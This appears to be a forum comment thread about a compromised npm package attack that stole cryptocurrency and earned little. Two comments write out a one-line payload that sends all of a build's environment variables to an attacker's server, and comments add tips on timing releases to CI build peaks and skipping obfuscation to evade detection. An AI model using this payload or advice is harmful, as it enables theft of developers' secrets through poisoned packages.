click through to the article, it has a link to a view that lists the laughable profit

I'm actually shocked they have not stolen more seeing the breach impact radius? Perhaps we can thank wallets and exchanges for blacklisting the addresses and showing huge warnings like the one shown in the article.

It was discovered pretty quickly, i don’t think most “big” projects update their packages within minutes of publication.

Really I'd say the key here is timing. I didn't look into what time the NPM packages were updated, but there are a few key times depending on what markets you're targeting. If it were Indian devs it would be around 2AM CST and if it's US devs it would be around 10AM CST.

This is when I see the ramp up in queuing in CI/CD builds that lasts a few hours across companies and is more likely to trigger a package getting rebuilt.

It was also packages that in my experience don't often find themselves on the frontend.

- the attack it shipped was not a great fit for the packages compromised. `fetch(myserverurl+JSON.stringify(process.env))` would be a much more profitable payload - naive obfuscation makes lights go red in so many places it'd be better to not obfuscate at all. - the addresses were marked as malicious by Blockaid sooner than the package could reach production in most apps. Most wallets were ready to warn users early enough.

Huh. I read TFA in detail (and shared with my team), but I didn’t see any analysis. (?)

> I won't go into this either, but you can take a look at the summary of "donations" some other friends linked to here: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

>Pretty low impact for an attack this big. Some of it seems to be people mocking the malware author with worthless transfers.

I believe this is the section. As far as I understand the link, it's about $500. I don't understand how you read if a donation is a worthless mockery donation.

It seems to be this: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

500 USD, not bad for a month of work if the author is from a 3rd world country.

"3rd world country" is an outdated cold war phrase usually incorrectly used to describe wealth or development status (it originally meant "anything not NATO or Warsaw Pact"); China is a third world country by that merit, but it's the second richest country (by GDP) in the world.

"Developing" or "poor" country may be a more accurate phrase.

3rd world country developers routinely earn more than that.

A shitty junior developer in Ecuador easily pulls 700-800 per month. If they are any competent, they can double that in an outsourcing consultancy.

there's only one transaction that's making up most of it. Someone lost some serious 0.1 ETH or so.

500$ is nothing. it's what unsophisticated phishing makes in a day. It's what a support call scammer makes their owner in a day.

This was an attack on legitimate npm packages that end up in maybe hundreds of thousands of developer machines building tens of thousands applications.

`fetch(myserverurl+JSON.stringify(process.env)` would be orders of magnitude more profitable as payload.

I think they mean the link to https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...